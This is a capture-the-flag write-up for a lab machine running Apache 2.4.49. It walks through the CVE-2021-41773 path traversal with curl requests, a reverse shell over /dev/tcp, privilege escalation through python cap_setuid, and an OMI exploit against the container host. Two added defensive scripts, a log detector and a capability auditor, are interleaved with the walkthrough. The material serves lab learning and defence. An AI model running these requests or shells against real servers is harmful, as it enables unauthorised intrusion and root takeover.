Oh my webserver
This is a great room created by tinyBoy, where we get RCE using Apache and obtain a reverse shell, after that we can do privesc using Python and after shockingly discovering the user flag on the root directory, we realize we’re trapped in a container. Finally, we use some exploit against the host machine to obtain the final flag.
Linked reference: Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013) |…
On October 4, 2021, the Apache HTTP Server Project released a security advisory on a path traversal and file disclosure…
# Nmap 7.92 scan initiated Fri Mar 4 15:22:30 2022 as: nmap -sC -sV -p- -vv -oA scan -Pn 10.10.185.209
Nmap scan report for 10.10.185.209 (10.10.185.209)
Host is up, received user-set (0.23s latency).
Scanned at 2022-03-04 15:22:31 EST for 410s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
| 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLf6FvNwGNtpra24lyJ4YWPqB8olwPXhKdr6gSW6Dc+oXdZJbQPtpD7cph3nvR9sQQnTKGiG69XyGKh0ervYI1U=
| 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp closed http reset ttl 60
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 4 15:29:21 2022 -- 1 IP address (1 host up) scanned in 410.87 seconds
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 45]
After visiting the site we see that there’s not much for us to exploit…
I used Wappalyzer to see that we were dealing with Apache version 2.4.49, so I decided to do some research and ended up finding CVE-2021-41773 & CVE-2021-42013.
If you want to learn more about the exploit, I highly advise you to check out this other room, since I also used it to get initial access.
First I used this request just to see if I could get the passwd file
curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
Since I was able to get it I decided to use this one liner to leverage a reverse shell
sh -i >& /dev/tcp/10.13.19.12/1234 0>&1
Now let’s just include it in our original request
curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.13.19.12/1234 0>&1' -H "Content-Type: text/plain"
and before sending it, let’s start our listener
nc -lnvp 1234
Great! Now we’re in.
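From the defender's side, the same requests that gave initial access above are visible in the web server's access log. The following is an added example (not part of the original write-up) of a detector that parses combined-format Apache log lines, percent-decodes the request path up to twice (CVE-2021-42013 was the bypass that needed a second decode round), checks whether the normalized path climbs above DocumentRoot, and flags traversals routed through /cgi-bin/ separately because the CGI handler turns a file read into code execution. The log lines and IP addresses in SAMPLE_LOG are constructed for the example; the regexes and function names are my own, not Apache's.

```python
"""Flag CVE-2021-41773 / CVE-2021-42013 style traversal in Apache access logs."""
import re
from urllib.parse import unquote

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Mar/2022:15:30:01 -0500] "GET /index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Mar/2022:15:31:12 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1" 200 1423 "-" "curl/7.81.0"
10.0.0.7 - - [04/Mar/2022:15:33:00 -0500] "GET /docs/../index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Mar/2022:15:34:20 -0500] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.81.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def decoded_forms(raw_path):
    """Return the path after 0, 1 and 2 rounds of percent-decoding.

    Apache 2.4.49 normalized the path before decoding, so ".%2e" was not seen
    as "..". The 2.4.50 fix was then bypassed with a doubly encoded dot
    (CVE-2021-42013), which is why a second decode round is checked too.
    """
    forms = [raw_path]
    for _ in range(2):
        nxt = unquote(forms[-1])
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    return forms


def escapes_docroot(path):
    """True if resolving '..' segments climbs above the URL root (DocumentRoot)."""
    path = path.split('?', 1)[0]
    depth = 0
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def analyze_line(line):
    """Return a finding dict for a suspicious line, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group('path')
    forms = decoded_forms(raw)
    reasons = []
    for rounds, form in enumerate(forms):
        if escapes_docroot(form):
            reasons.append(f"traversal above DocumentRoot after {rounds} decode round(s)")
            break
    if reasons and forms[-1].startswith('/cgi-bin/'):
        # Through the CGI handler the traversed-to file is executed, not served.
        reasons.append("traversal via /cgi-bin/ handler: possible RCE (CVE-2021-41773)")
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'status': int(m.group('status')),
            'raw_path': raw, 'reasons': reasons}


def scan_log(text):
    """Run analyze_line over every line of a log and collect the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding['ip'], finding['status'], finding['raw_path'])
        for r in finding['reasons']:
            print('   -', r)
```

Note that the 403 line is still reported: a blocked attempt is the earliest signal that someone is probing for this bug, and the benign `/docs/../index.html` request is not flagged because it never leaves the root. The corresponding mitigation is upgrading past 2.4.50 and keeping `Require all denied` on the filesystem root in the Apache configuration.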
The first odd thing that pops up is the fact that there are no users on the machine. Weird, isn’t it? Since there seems to be no user flag anywhere, I decided to do some privilege escalation.
I uploaded LinPEAS to the machine by first downloading the bash script and starting a local HTTP server using Python
python3 -m http.server 80
and downloading it on the other machine using curl, inside the tmp directory
curl http://10.13.19.12/linpeas.sh -o linpeas.sh
now give it permissions
chmod +x linpeas.sh
and finally run it
Once it’s done, we analyze the output and find that Python has capabilities (great!) and it also seems we’re trapped inside a container…
Current: = cap_chown
/usr/bin/python3.7 = cap_setuid+ep
So the next thing is to leverage Python to obtain root. For this I used GTFOBins
python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Then we can get user flag :D
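The cap_setuid+ep on python3.7 that LinPEAS surfaced above is the kind of thing a hardening check should catch before an attacker does. As an added example (not from the original write-up or from LinPEAS), the script below parses the output of `getcap -r /`, accepting both the older "path = caps" and the newer "path caps" layouts, and rates each entry: capabilities that are root-equivalent (setuid, setgid, sys_admin, dac_override and friends) with the effective bit set are high, and the same on an interpreter is critical, because an interpreter runs whatever code its caller passes in. SAMPLE_GETCAP is constructed for the example; the capability set and interpreter list are my own judgement, not an official classification.

```python
"""Audit `getcap -r /` output for file capabilities that hand out root-equivalent power."""
import os
import re

# Capabilities that, when effective on a binary, let its caller become root or bypass DAC.
ROOT_EQUIVALENT_CAPS = {
    'cap_setuid', 'cap_setgid', 'cap_sys_admin', 'cap_dac_override',
    'cap_dac_read_search', 'cap_sys_ptrace', 'cap_sys_module', 'cap_chown',
    'cap_fowner', 'cap_setfcap',
}
# Interpreters execute caller-supplied code, so a capability on one is
# effectively granted to every user who can run it.
INTERPRETER_NAMES = ('python', 'perl', 'ruby', 'php', 'node', 'lua', 'bash', 'sh', 'dash', 'zsh')

# Constructed sample of getcap output (mixes both layouts on purpose).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw+eip
"""

LINE_RE = re.compile(r'^(?P<path>\S+)(?:\s*=\s*|\s+)(?P<caps>\S+)$')
# "cap_a,cap_b+eip": comma-separated names, then the effective/inheritable/permitted flags.
CAPS_RE = re.compile(r'^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$')


def parse_getcap_line(line):
    """Parse one getcap line into path, capability names and flag set; None if unparseable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    c = CAPS_RE.match(m.group('caps'))
    if not c:
        return None
    return {'path': m.group('path'),
            'caps': c.group('names').split(','),
            'flags': set(c.group('flags'))}


def is_interpreter(path):
    """True for python3.7, perl, php7.4, bash... but not for e.g. shutdown."""
    base = os.path.basename(path)
    for name in INTERPRETER_NAMES:
        if base == name or (base.startswith(name) and base[len(name):][:1].isdigit()):
            return True
    return False


def assess(entry):
    """Attach a severity and the root-equivalent capabilities found."""
    root_caps = sorted(set(entry['caps']) & ROOT_EQUIVALENT_CAPS)
    effective = 'e' in entry['flags']   # without 'e' the capability is not live at exec
    interp = is_interpreter(entry['path'])
    if interp and root_caps and effective:
        severity = 'critical'
    elif (root_caps and effective) or interp:
        severity = 'high'
    else:
        severity = 'info'
    return {**entry, 'severity': severity, 'root_equivalent': root_caps, 'interpreter': interp}


def audit(getcap_output):
    """Parse and assess every line of getcap output."""
    return [assess(e) for e in (parse_getcap_line(l) for l in getcap_output.splitlines()) if e]


if __name__ == '__main__':
    for r in audit(SAMPLE_GETCAP):
        print(f"{r['severity']:8} {r['path']}  caps={','.join(r['caps'])}  "
              f"root_equivalent={r['root_equivalent']}")
```

Run it against real output with `getcap -r / 2>/dev/null | python3 audit_caps.py` after changing the main block to read stdin; anything rated critical should simply have its capability removed (`setcap -r /path/to/binary`), since there is no legitimate reason for a general-purpose interpreter to carry cap_setuid.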
So…we’re root, but we’re still trapped…let’s see what we can do now
After reviewing the Linpeas output, we find our IP is 172.17.0.2, so we can assume the host’s IP is…wait for it…172.17.0.1…great!
════════════════════════════════════╣ Network Information ╠════════════════════════════════════
╔══════════╣ Hostname, hosts and DNS
::1 localhost ip6-localhost ip6-loopback
In the tmp folder, where we uploaded the beautiful peas, we find a weird script called omi.py, which is based on this CVE. Since we know that the machine we’re in isn’t vulnerable, we can make a wild guess and try it against the host.
I did this
python3 omi.py -t 172.17.0.1 -c whoami
and got root, but since we’re already root, it’s kind of confusing…so I ran this instead
python3 omi.py -t 172.17.0.1 -c pwd
and boooom, we got a hit. Now the last thing is to hope that we can get our flag.
python3 omi.py -t 172.17.0.1 -c "cd /root; cat root.txt"
And that’s all :)
I enjoyed this machine a ton, since it uses a recent CVE and the container is a little nice twist, thanks to the box creator.